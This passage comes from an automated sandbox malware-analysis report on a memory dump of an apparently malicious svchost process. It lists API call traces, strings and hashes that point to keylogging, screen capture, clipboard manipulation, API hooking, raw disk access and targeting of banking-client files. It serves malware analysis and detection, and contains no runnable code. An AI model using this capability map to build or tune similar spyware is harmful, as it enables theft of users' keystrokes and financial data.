                                                                                                                                                                                                                  • Part of subcall function 02D2C780: IsWindowVisible.USER32(00000000), ref: 02D2C7AC
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: GetWindowRect.USER32(00000000,?), ref: 02D2C7E9
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: GetClassLongA.USER32(00000000,000000E6), ref: 02D2C7F2
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: PrintWindow.USER32(00000000,?,00000000,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C805
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C82B
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: CreateRectRgn.GDI32(?,?,02D290B9,?), ref: 02D2C841
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: GetWindowRgn.USER32(00000000,00000000), ref: 02D2C84B
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: OffsetRgn.GDI32(00000000,?,?), ref: 02D2C865
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: SelectClipRgn.GDI32(?,00000000), ref: 02D2C870
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: BitBlt.GDI32(?,?,?,02D290B9,?,?,00000000,00000000,00CC0020), ref: 02D2C899
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02D2CF3E
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 02D2CF4D
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2CF7E
                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 02D2CF8B
                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 02D2CFA2
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(?,000000FA,0000003C,?,75C0BCB0,75BF3EB0), ref: 02D2CFCD
                                                                                                                                                                                                                • GetScrollBarInfo.USER32(?,000000FB,0000003C,?,75C0BCB0,75BF3EB0), ref: 02D2D005
                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 02D2D042
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2D045
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$InfoRectScroll$Long$Iconicmemset$ClassClipCreateOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                                • String ID: <$<
                                                                                                                                                                                                                • API String ID: 3463799249-213342407
                                                                                                                                                                                                                • Opcode ID: c08271b2fa87e59e433597f00cefcd1d2820af886adf71d54dfc471a671b24cc
                                                                                                                                                                                                                • Instruction ID: 355dfe19d0298080a36d6dd567c14119b2929e8b8d9b8f986cccbfad7da3a613
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c08271b2fa87e59e433597f00cefcd1d2820af886adf71d54dfc471a671b24cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E611671D052289FDB24DFA8DC88BDEBBB9AF58714F14425AE404A3380DB746D85CFA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D42210
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02D4221D
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02D42232
                                                                                                                                                                                                                  • Part of subcall function 02D27220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
                                                                                                                                                                                                                  • Part of subcall function 02D27220: RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
                                                                                                                                                                                                                  • Part of subcall function 02D27220: memset.MSVCRT ref: 02D272A7
                                                                                                                                                                                                                  • Part of subcall function 02D27220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
                                                                                                                                                                                                                  • Part of subcall function 02D27220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
                                                                                                                                                                                                                  • Part of subcall function 02D27220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
                                                                                                                                                                                                                  • Part of subcall function 02D27220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
                                                                                                                                                                                                                  • Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
                                                                                                                                                                                                                  • Part of subcall function 02D27220: HeapValidate.KERNEL32(00000000), ref: 02D2731B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02D4227D
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D4229D
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D422AF
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D422DE
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D422EF
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D422F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D42308
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D42319
                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02D42367
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 02D4237E
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 02D42387
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Heap$CharCreateHandleMutexNamePathProcessUpperstrstr$AllocateCloseExistsFindInformationLockModulePointerPrivateProfileReadReleaseSizeSleepStringUnlockValidatememset
                                                                                                                                                                                                                • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$interpro.ini
                                                                                                                                                                                                                • API String ID: 225490952-373839803
                                                                                                                                                                                                                • Opcode ID: 91a78750e2ba1c59e2fab0cb5ba037e994bf9412bf73ba07b562656cba015e5d
                                                                                                                                                                                                                • Instruction ID: 25463f70ba1ef4ae6a5aadb3ba72abdb94f8504734fa80db5546b913d4cf3aab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91a78750e2ba1c59e2fab0cb5ba037e994bf9412bf73ba07b562656cba015e5d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D25115719403419BD7219B64AC8CBAA7BB9AB05708F548498FDC9A7341DFB4ED88CB70
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02D450EE
                                                                                                                                                                                                                • GetWindowDC.USER32(00000000), ref: 02D450F5
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 02D4510A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CompatibleCreateDesktop
                                                                                                                                                                                                                • String ID: ($BM
                                                                                                                                                                                                                • API String ID: 3720047489-2980357723
                                                                                                                                                                                                                • Opcode ID: 7864634b6d66a0caff695dcd52ad5ae677557886db7cd46e5a695ab402f2e926
                                                                                                                                                                                                                • Instruction ID: 297d17170d398268ce1d71e6b7459ff36a1a637990f4577692934fce2d56bead
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7864634b6d66a0caff695dcd52ad5ae677557886db7cd46e5a695ab402f2e926
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47515FB1D40218AFDB10DFA4E888BAEB7B9FF58710F904559F904AB340DB749D518BB4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02D3166E
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000), ref: 02D31675
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D316F0
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D316F9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,74DEF550,74DF1620,80000002), ref: 02D31743
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D31746
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D31753
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D31756
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D31766
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D31780
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D317AF
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D317B2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D317BF
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D317C2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                                • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                                • API String ID: 2523706361-3242205626
                                                                                                                                                                                                                • Opcode ID: f2de9f765f0ed08a909e378bfa19bcf59b708f44acd0d07c4a7baaf0b49d36e9
                                                                                                                                                                                                                • Instruction ID: 440d47f04f5fcdbcb5e8102f4eaf5388f2fa2dfb27331730618ee313b4223f7d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2de9f765f0ed08a909e378bfa19bcf59b708f44acd0d07c4a7baaf0b49d36e9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38310871E8135267E7222670AC8DFAB3B89CF04B55F1C0528E989EB341E6A4CC94C6F1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D32B82
                                                                                                                                                                                                                  • Part of subcall function 02D32A90: GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02D32A9E
                                                                                                                                                                                                                  • Part of subcall function 02D32A90: GetWindowTextA.USER32(00000000,?,00000104), ref: 02D32AB9
                                                                                                                                                                                                                  • Part of subcall function 02D32A90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B17
                                                                                                                                                                                                                  • Part of subcall function 02D32A90: HeapValidate.KERNEL32(00000000), ref: 02D32B1A
                                                                                                                                                                                                                  • Part of subcall function 02D32A90: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32B27
                                                                                                                                                                                                                  • Part of subcall function 02D32A90: HeapFree.KERNEL32(00000000), ref: 02D32B2A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02D32BE5
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D32BEC
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D32BFF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02D32C0F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02D32C16
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02D34181,?,?,?,00000000), ref: 02D32C36
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D32C3D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
                                                                                                                                                                                                                • String ID: [bks]$[del]$[ins]$[ret]$[tab]
                                                                                                                                                                                                                • API String ID: 4095246728-233650549
                                                                                                                                                                                                                • Opcode ID: e8e5f3be71106b9bd0e986619d3d0ff64b8bdfcb0c287dd748c8a9f8005efa48
                                                                                                                                                                                                                • Instruction ID: 1df401c2d6148d921cff689ea6addf401c87f96afb1fa116f6b1648158e7091d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8e5f3be71106b9bd0e986619d3d0ff64b8bdfcb0c287dd748c8a9f8005efa48
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C51AF71D40249ABCB16CF68E85CBEABBB5FF54740F04859AEC859B340E7349E44CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74DEF550,74DEDF10,75BFBD50), ref: 02D2167A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D2168B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 02D2169F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02D216C1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 02D216D1
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: memcpy.MSVCRT ref: 02D3A0A0
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32.dll), ref: 02D216EC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetWindowTextA), ref: 02D216F8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressModuleProcVirtual$HandleProtect$AllocFileNamememcpy
                                                                                                                                                                                                                • String ID: CreateFileW$GetFileAttributesW$GetWindowTextA$\explorer.exe$kernel32.dll$user32.dll
                                                                                                                                                                                                                • API String ID: 1733008709-77332811
                                                                                                                                                                                                                • Opcode ID: 347fbaa0070a426a4a2cde0f2db97293662b6f83db37c761b59c93a0ed7abe2a
                                                                                                                                                                                                                • Instruction ID: d97f098d5fa5f17a0d03c799f749834ec985dd89f8e3f35c5ec4120dd37ea0d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 347fbaa0070a426a4a2cde0f2db97293662b6f83db37c761b59c93a0ed7abe2a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41019671B8136633F52066B57D4AFAA335C6B65E4EF444110BA89F2341EAE8DC4CC978
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D33021
                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33038
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(02D7DFC4,?,?,?), ref: 02D33048
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D33075
                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02D33097
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000000,74DE9300), ref: 02D330C1
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330D0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 02D330E9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 02D330FA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D33117
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D33128
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                                • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                                • API String ID: 649538874-3292898883
                                                                                                                                                                                                                • Opcode ID: a9210fcfbc5d337fb8e486cd966105d07c2de794aba8aa31808e2ed028b85ee2
                                                                                                                                                                                                                • Instruction ID: 44e15a2518fe36251ecab762496b41abbc317175a05c3559495236691651553d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9210fcfbc5d337fb8e486cd966105d07c2de794aba8aa31808e2ed028b85ee2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28310D71980214BBE7329B50ED4DFEA77A89B09B18F508184FA04AA2C0C7F45E84CBF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D43927
                                                                                                                                                                                                                • PathFindFileNameA.SHLWAPI(?), ref: 02D43934
                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02D43984
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 02D4399C
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 02D439A5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 02D439B5
                                                                                                                                                                                                                  • Part of subcall function 02D43770: PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D437A0
                                                                                                                                                                                                                  • Part of subcall function 02D43770: CreateDirectoryA.KERNEL32(?,00000000), ref: 02D437E1
                                                                                                                                                                                                                  • Part of subcall function 02D43770: GetLastError.KERNEL32 ref: 02D437EB
                                                                                                                                                                                                                  • Part of subcall function 02D43770: IsUserAnAdmin.SHELL32 ref: 02D437F3
                                                                                                                                                                                                                  • Part of subcall function 02D43770: PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43804
                                                                                                                                                                                                                  • Part of subcall function 02D43770: SetLastError.KERNEL32(00000000), ref: 02D4380B
                                                                                                                                                                                                                  • Part of subcall function 02D43770: SetCurrentDirectoryA.KERNEL32(?), ref: 02D43818
                                                                                                                                                                                                                  • Part of subcall function 02D43770: PathAddBackslashA.SHLWAPI(02D7D098,?,02D439CC), ref: 02D43887
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D439D6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
                                                                                                                                                                                                                • String ID: DefaultPrivateDir$General$STF$interpro.ini
                                                                                                                                                                                                                • API String ID: 2256374885-2588321666
                                                                                                                                                                                                                • Opcode ID: 966fe87df5814eb98b8bc0f15d7cb786e86df19403951a67b10e1ead29176c14
                                                                                                                                                                                                                • Instruction ID: 11687cf0a09c14d54a4508d80a18e12ad71537554f0b75016103c3b726500736
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 966fe87df5814eb98b8bc0f15d7cb786e86df19403951a67b10e1ead29176c14
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 341190B59802159BD750EB64ED89EEA7778AB44700F0045C5E5C9A7340EFB4AE88CFB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 02D4D6CA
                                                                                                                                                                                                                • strchr.MSVCRT ref: 02D4D6D9
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 02D4D7C5
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 02D4D7D9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                                • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                                • API String ID: 23527507-2295261572
                                                                                                                                                                                                                • Opcode ID: 373ce08331639837de8380799577121c2037b397e4c3cd3b960b0175f328359f
                                                                                                                                                                                                                • Instruction ID: 6b62d8cdc58d77604a2ba73d88f68961758f3bc965ad396df4f32a0dcc9fb081
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 373ce08331639837de8380799577121c2037b397e4c3cd3b960b0175f328359f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3413531A0029D5FEF258B24DC54BEA77A2AF41304F2482E5D98EA7341DB71AE85CF60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D41184
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,cbsmain.dll), ref: 02D41196
                                                                                                                                                                                                                • GetAncestor.USER32(?,00000002,?,00000104), ref: 02D411B6
                                                                                                                                                                                                                • GetWindowTextA.USER32(00000000), ref: 02D411BD
                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,02D41400,?,?,?), ref: 02D4125E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D41276
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D41287
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$AncestorCloseCreateFileInformationModuleNameTextThreadWindow
                                                                                                                                                                                                                • String ID: cbsmain.dll
                                                                                                                                                                                                                • API String ID: 741776142-1394916644
                                                                                                                                                                                                                • Opcode ID: 5dfc4474d043f76c83e9d3e1fc383ebd77a3c9c4e3678647953164698b0794d6
                                                                                                                                                                                                                • Instruction ID: 0bc3570398aaa73b4d97c0a8e4a076a37e791ba99a19c18387ef3ba676a8014d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dfc4474d043f76c83e9d3e1fc383ebd77a3c9c4e3678647953164698b0794d6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0731D471A442455BD7608F7098CABBA3B699B12344F448684ED89C6381EB76CDCCCA60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,?), ref: 02D292DF
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 02D292ED
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(000004E3,00000001,?,?,00000000,?), ref: 02D29306
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02D29313
                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 02D2931B
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 02D29327
                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 02D29333
                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 02D2933C
                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 02D29342
                                                                                                                                                                                                                Memory Dump Source
